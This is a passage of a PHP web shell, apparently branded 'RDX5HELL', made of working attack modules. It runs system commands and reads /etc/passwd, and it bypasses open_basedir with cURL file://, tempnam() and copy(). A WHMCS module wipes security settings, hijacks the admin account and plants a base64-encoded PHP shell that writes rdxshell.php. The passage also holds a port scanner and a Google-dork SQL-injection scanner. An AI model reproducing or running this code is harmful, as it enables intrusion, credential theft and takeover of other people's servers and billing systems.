  1160. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1161. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1162. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1163. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1164. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1165. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1166. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1167. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1168. while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  1169. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  1170. $ret = convert_cyr_string($ret,"d","w");
  1171. $stack = explode("\n",$ret);
  1172. unset($stack[0],$stack[2]);
  1173. $stack = array_values($stack);
  1174. $head = explode("",$stack[0]);
  1175. $head[1] = explode(" ",$head[1]);
  1176. $head[1] = $head[1][0];
  1177. $stack = array_slice($stack,1);
  1178. unset($head[2]);
  1179. $head = array_values($head);
  1180. if ($k > count($head)) {$k = count($head)-1;}
  1181. $prcs = array();
  1182. foreach ($stack as $line)
  1183. {
  1184. if (!empty($line))
  1185. {
  1186. echo "<tr>";
  1187. $line = explode("",$line);
  1188. $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  1189. $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  1190. $prcs[] = $line;
  1191. echo "</tr>";
  1192. }
  1193. }
  1194. }
  1195. $head[$k] = "<b>".$head[$k]."</b>".$y;
  1196. $v = $processes_sort[0];
  1197. if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  1198. $tab = array();
  1199. $tab[] = $head;
  1200. $tab = array_merge($tab,$prcs);
  1201. echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
  1202. foreach($tab as $i=>$k)
  1203. {
  1204. echo "<tr>";
  1205. foreach($k as $j=>$v) {
  1206. if ($win and $i > 0 and $j == 2) {
  1207. $v = view_size($v);
  1208. }
  1209.  
  1210. echo "<td>".$v."</td>";}
  1211. echo "</tr>";
  1212. }
  1213. echo "</table>";
  1214. }
  1215. }
  1216.  
  1217. echo "<center><br/><br/><nobr><b><span class='b7'> BYPASS</span> <span class='b8'>PROCESS </span></b></nobr><br/><br/>";
  1218.  
  1219. if($win) {
  1220. echo "<form method='post'>
  1221. <select class='inputz' name='windowsprocess'>
  1222. <option name='systeminfo'>System Info</option>
  1223. <option name='active'>Active Connections</option>
  1224. <option name='runningserv'>Running Services</option>
  1225. <option name='useracc'>User Accounts</option>
  1226. <option name='showcom'>Show Computers</option>
  1227. <option name='arptab'>ARP Table</option>
  1228. <option name='ipconf'>IP Configuration</option></select>
  1229. <input type='submit' class='inputzbut' name='submitwinprocess' value='View'>
  1230. </form>";
  1231. } else {
  1232. echo "<form method='post'>
  1233. <select class='inputz' name='nonwindowsprocess'>
  1234. <option name='passwd'>Passwd</option>
  1235. <option name='syslog'>Syslog</option>
  1236. <option name='resolv'>Resolv</option>
  1237. <option name='hosts'>Hosts</option>
  1238. <option name='cpuinfo'>Cpuinfo</option>
  1239. <option name='version'>Version</option>
  1240. <option name='sbin'>Sbin</option>
  1241. <option name='interrupts'>Interrupts</option>
  1242. <option name='lsattr'>lsattr</option>
  1243. <option name='uptime'>Uptime</option>
  1244. <option name='fstab'>Fstab</option>
  1245. <option name='hddspace'>HDD Space</option>
  1246. </select>
  1247. <input type='submit' class='inputzbut' name='submitnonwinprocess' value=' >> '></form>";
  1248. }
  1249.  
  1250. $windowsprocess = $_POST['windowsprocess'];
  1251. $nonwindowsprocess = $_POST['nonwindowsprocess'];
  1252.  
  1253. if ($windowsprocess=="System Info") $winruncom = "systeminfo";
  1254. if ($windowsprocess=="Active Connections") $winruncom = "netstat -an";
  1255. if ($windowsprocess=="Running Services") $winruncom = "net start";
  1256. if ($windowsprocess=="User Accounts") $winruncom = "net user";
  1257. if ($windowsprocess=="Show Computers") $winruncom = "net view";
  1258. if ($windowsprocess=="ARP Table") $winruncom = "arp -a";
  1259. if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all";
  1260. if ($nonwindowsprocess=="Syslog") $winruncom = "cat /etc/syslog.conf";
  1261. if ($nonwindowsprocess=="Resolv") $winruncom = "cat /etc/resolv.conf";
  1262. if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";
  1263. if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
  1264. if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
  1265. if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
  1266. if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
  1267. if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
  1268. if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
  1269. if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
  1270. if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
  1271. if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
  1272. if (isset($winruncom)) {
  1273. echo "<table class='cmdbox'><tbody><tr><td colspan='2'><textarea class='output' name='content'>".exe($winruncom)."</textarea></td></tr></table></center>";
  1274. }
  1275. if (isset($systeminfo)) {
  1276. echo "<br><br>";
  1277. process();
  1278. }
  1279. }
  1280.  
  1281. // ********** x=basedir ********** //
  1282. elseif(isset($_GET['x']) && ($_GET['x'] == 'basedir')) {
  1283. // bypass basedir
  1284. @error_reporting(0);
  1285. function CleanDir($d){
  1286. $d=str_replace("\\","/",$d);
  1287. $d=str_replace("//","/",$d);
  1288. return $d;
  1289. }
  1290. if(isset($_POST['curl_bypass'])){
  1291. @error_reporting(0);
  1292. $ch=curl_init("file://$_POST[file_bypass]");
  1293. curl_setopt($ch,CURLOPT_HEADERS,0);
  1294. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1295. $file_out=curl_exec($ch);
  1296. curl_close($ch);
  1297. echo "<br/><br/><center><textarea rows='20' style='color:#FF0000;background-color:#000000' cols='70' >".htmlspecialchars($file_out)."</textarea></br></br>";
  1298. }
  1299.  
  1300. elseif(isset($_POST['tmp_bypass'])) {
  1301. tempnam("/home/",$_POST['file_passwd']);
  1302. }
  1303.  
  1304. elseif(isset($_POST['copy_bypass'])) {
  1305. if(@copy($_POST['file_bypass'],$_POST['dest'])) {
  1306. @$fh=fopen($_POST['dest'],'r');
  1307. echo "<textarea rows='20' style='color:#FF0000;background-color:#000000' cols='70'>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>";
  1308. @fclose($fh);
  1309. } else echo "<center><br/><br/>
  1310. <h1> BYPASS DENIED </h1><br></br>";
  1311. }
  1312. echo "<br/><br/><table style='margin: auto; width: 100%; text-align: center;'><tr>
  1313. <td colspan='3'> <center><br/><br/><nobr><b><span class='b7'> BYPASS</span><span class='b8'>BASEDIR </span></b></nobr><br/><br/></center> </td>
  1314. </tr>
  1315. <tr>
  1316. <td>[~] Bypass Basedir cURL [~]</td>
  1317. <td>[~] Bypass Basedir tempnam() [~]</td>
  1318. <td>[~] Bypass Basedir copy() [~]</td>
  1319. </tr>
  1320. <tr>
  1321. <td><nobr><form method='post' name='bypasser'>
  1322. FILE : <input type='text' style='color:#FF0000;background-color:#000000' value='/etc/passwd' name='file_bypass'>
  1323.  
  1324. <input type='submit' name='curl_bypass' style='color:#FF0000;background-color:#000000' value='Bypass'></form></td>
  1325.  
  1326. <td><nobr><form method='post' name='bypasser'>FILE : <input type='text' style='color:#FF0000;background-color:#000000' value='../../../etc/passwd' name='file_bypass'>
  1327.  
  1328. <input type='submit' style='color:#FF0000;background-color:#000000' name='tmp_bypass' value='Bypass'>
  1329. </nobr></form>
  1330. </td>
  1331. <td><nobr><form method='post' name='bypasser'>FILE COPY TO : <input type='text'style='color:#FF0000;background-color:#000000' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/bypass.txt'> <input type='text' style='color:#FF0000;background-color:#000000' value='/etc/passwd' name='file_bypass'>
  1332.  
  1333. <input type='submit' name='copy_bypass' style='color:#FF0000;background-color:#000000' value='Bypass'>
  1334. </nobr></form>
  1335. </td>
  1336. </table>";
  1337. }
  1338.  
  1339.  
  1340. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmtools'))
  1341. {
  1342. ?>
  1343. <form action="?y=<?php echo $pwd; ?>&amp;x=whmtools" method="post">
  1344.  
  1345. <?php
  1346. echo "<html><head><title>Whmcs Tools</title></head>";
  1347. echo "<body><center>
  1348. <h2>--=[~] RDX5HELL [~]=--</h2>
  1349. <h3>WHMCS Inject Shell | Auto Bypass Security Token | Login Changer Tools</h3>
  1350. <form method=POST action=''>
  1351. <p>
  1352. WHMCS DB HOST<br/>
  1353. <input value=localhost style='color:lime;background-color:#000000' type=text name=anu1 size='40'><br/>
  1354. WHMCS DB NAME<br/>
  1355. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  1356. WHMCS DB USERNAME<br/>
  1357. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  1358. WHMCS DB PASSWORD<br/>
  1359. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/> <hr style='color:lime;'> <p>TARGET ID ADMIN<br/>
  1360. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
  1361. NEW ADMIN LOGIN USER<br/>
  1362. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  1363. NEW ADMIN LOGIN PASS<br/>
  1364. <input value=rd style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/>
  1365. SHELL TYPE {PHP}<br/>
  1366. <textarea style='color:lime;background-color:#000000' rows='10' cols='80'
  1367. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ3JkeHNoZWxsLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea><br/>
  1368.  
  1369. <p><input type=submit style='color:lime;background-color:#000000' value=' >> GO >> ' ></form>
  1370. <p>
  1371. [+] Thanks To RAB3OUN sec4ever [+]";
  1372.  
  1373. $anu1 = $_POST['anu1'];
  1374. $anu2 = $_POST['anu2'];
  1375. $anu3 = $_POST['anu3'];
  1376. $anu4 = $_POST['anu4'];
  1377. @mysql_connect($anu1,$anu3,$anu4);
  1378. @mysql_select_db($anu2);
  1379.  
  1380. $shell=str_replace("'","'",$shell);
  1381. $gosok_shell = $_POST['shell'];
  1382. $idmaho=str_replace("\'","'",$idmaho);
  1383. $target_id = $_POST['idmaho'];
  1384. $userbaru=str_replace("\'","'",$userbaru);
  1385. $ganti_user = $_POST['userbaru'];
  1386. $passbaru=str_replace("\'","'",$passbaru);
  1387. $hash_pass = $_POST['passbaru'];
  1388. $ganti_pass = md5($hash_pass);
  1389.  
  1390. $colok1 = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE id ='9'";
  1391. $colok2 = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
  1392. $colok3 = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
  1393. $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
  1394. $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
  1395. $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
  1396. $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
  1397. $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
  1398. $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
  1399. $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
  1400. $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
  1401. $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";
  1402. $crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
  1403.  
  1404. $udah_ganteng=@mysql_query($crot1);
  1405. $udah_ganteng=@mysql_query($crot2);
  1406. $udah_ganteng=@mysql_query($crot3);
  1407. $udah_ganteng=@mysql_query($crot4);
  1408. $udah_ganteng=@mysql_query($crot5);
  1409. $udah_ganteng=@mysql_query($crot6);
  1410. $udah_ganteng=@mysql_query($crot7);
  1411. $udah_ganteng=@mysql_query($crot8);
  1412. $udah_ganteng=@mysql_query($crot9);
  1413. $udah_ganteng=@mysql_query($crot10);
  1414. $udah_ganteng=@mysql_query($colok1);
  1415. $udah_ganteng=@mysql_query($colok2);
  1416. $udah_ganteng=@mysql_query($colok3);
  1417. if($udah_ganteng)
  1418. {
  1419. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  1420. }
  1421. }
  1422.  
  1423.  
  1424. // ********** x=whois ********** //
  1425. elseif(isset($_GET['x']) && ($_GET['x'] == 'whois')){
  1426. // website information
  1427. ?>
  1428. <form action="?rd=<?php echo $pwd; ?>&amp;x=whois" method="post">
  1429.  
  1430.  
  1431. <?php
  1432. function sws_domain_info($site){
  1433. $getip = @file_get_contents("http://networktools.nl/whois/$site");
  1434. flush();
  1435. $ip = @findit($getip,'<pre>','</pre>');
  1436. return $ip;
  1437. flush();
  1438. }
  1439.  
  1440. function sws_net_info($site){
  1441. $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  1442. $ip = @findit($getip,'<pre>','</pre>');
  1443. return $ip;
  1444. flush();
  1445. }
  1446.  
  1447. function sws_site_ser($site){
  1448. $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  1449. $ip = @findit($getip,'<pre>','</pre>');
  1450. return $ip;
  1451. flush();
  1452. }
  1453.  
  1454. function sws_sup_dom($site){
  1455. $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  1456. $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  1457. return $ip;
  1458. flush();
  1459. }
  1460.  
  1461. function susun_info($function){
  1462. $atur = explode("\n", $function);
  1463. foreach(array_unique($atur) as $aturkan){echo $aturkan."<br>";}
  1464. }
  1465.  
  1466. function findit($mytext,$starttag,$endtag) {
  1467. $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  1468. $posRight = @stripos($mytext,$endtag,$posLeft+1);
  1469. return @substr($mytext,$posLeft,$posRight-$posLeft);
  1470. flush();
  1471. }
  1472. ?>
  1473. <br/><br/><center><div class="sc">
  1474. <form method="post">
  1475. Website :
  1476. <input type="text" name="site" size="30" class="inputz" value="<? if(isset($_POST['site'])){echo $_POST['site'];}else{echo $_SERVER['HTTP_HOST'];} ?>" />
  1477. <input type="submit" class="inputzbut" name="scan" value="Scan !" />
  1478. </form>
  1479. </div>
  1480. <?php
  1481. if(isset($_POST['scan'])){
  1482. $site = @htmlentities($_POST['site']);
  1483. if (empty($site)){die('<br /><br /> Not add IP .. !');}
  1484. $ip_port = @gethostbyname($site);
  1485. ?>
  1486. <table class="tabnet" style="width:550px;">
  1487. <tbody>
  1488. <tr>
  1489. <th> SCANNING </th></tr>
  1490. <tr>
  1491. <td align="center"><br>
  1492. Site : <? echo $site; ?><br>
  1493. IP : <? echo $ip_port; ?><br>
  1494. <br></td>
  1495. </tr>
  1496. <tr>
  1497. <th> Open Port </th>
  1498. </tr>
  1499. <tr>
  1500. <td align="center">
  1501. <?
  1502. $list_post = array('80','21','22','2082','25','53','110','443','143');
  1503. foreach ($list_post as $o_port){
  1504. $connect = @fsockopen($ip_port,$o_port,$errno,$errstr,5);
  1505. if($connect){
  1506. echo "$ip_port : $o_port &nbsp;&nbsp;&nbsp; <u style=\"color: #009900\">Open</u><br>";
  1507. flush();
  1508. }
  1509. }
  1510. ?>
  1511. </td>
  1512. </tr>
  1513. <tr>
  1514. <th> Domain Info </th>
  1515. </tr>
  1516. <tr>
  1517. <td align="center">
  1518. <? echo (susun_info(sws_domain_info($site))); ?>
  1519. </td>
  1520. </tr>
  1521. <tr>
  1522. <th> Network Info </th>
  1523. </tr>
  1524. <tr>
  1525. <td align="center">
  1526. <? echo (susun_info(sws_net_info($site))); ?>
  1527. </td>
  1528. </tr>
  1529. <tr>
  1530. <th> Subdomains Server </th>
  1531. </tr>
  1532. <tr>
  1533. <td align="center">
  1534. <? echo (susun_info(sws_sup_dom($site))); ?>
  1535. </td>
  1536. </tr>
  1537. </tbody>
  1538. </table>
  1539. </center>
  1540. <?
  1541. }
  1542. }
  1543.  
  1544. // x=sqlscan
  1545. elseif(isset($_GET['x']) && ($_GET['x'] == 'sqlscan')) {
  1546. // sql vuln scanner
  1547. ?>
  1548. <form action="?rd=<?php echo $pwd; ?>&amp;x=sqliscan" method="post">
  1549.  
  1550. <br><br>
  1551. <center>
  1552. <form method="post">
  1553. <font color="red">Dork :</font>
  1554. <input type="text" name="dork" class="inputz" size="20"/>
  1555. <input type="submit" class="inputzbut" name="scan" value="Scan">
  1556. </form>
  1557. </center>
  1558.  
  1559. <?php
  1560.  
  1561. if (isset($_POST['dork']) && !empty($_POST['dork'])) {
  1562. $browser = $_SERVER['HTTP_USER_AGENT'];
  1563. $first = "startgoogle.startpagina.nl/index.php?q=";
  1564. $sec = "&start=";
  1565. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  1566.  
  1567. for($id=0 ; $id<=30; $id++){
  1568. $page=$id*10;
  1569. $dork=urlencode($_POST['dork']);
  1570. $url = $first.$dork.$sec.$page;
  1571.  
  1572. $curl = curl_init($url);
  1573. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1574. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  1575. $result = curl_exec($curl);
  1576. curl_close($curl);
  1577. preg_match_all($reg,$result,$matches);
  1578. }
  1579. foreach($matches[1] as $site){
  1580. $url = preg_replace("/=/", "='", $site);
  1581. $curl=curl_init();
  1582. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1583. curl_setopt($curl,CURLOPT_URL,$url);
  1584. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  1585. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  1586. $GET=curl_exec($curl);
  1587. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  1588.  
  1589. echo '<center><b>
  1590. <font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font style="color:#FF0000"> &#60;-- SQLI Vuln Found..</font></b></center>';
  1591. } else {
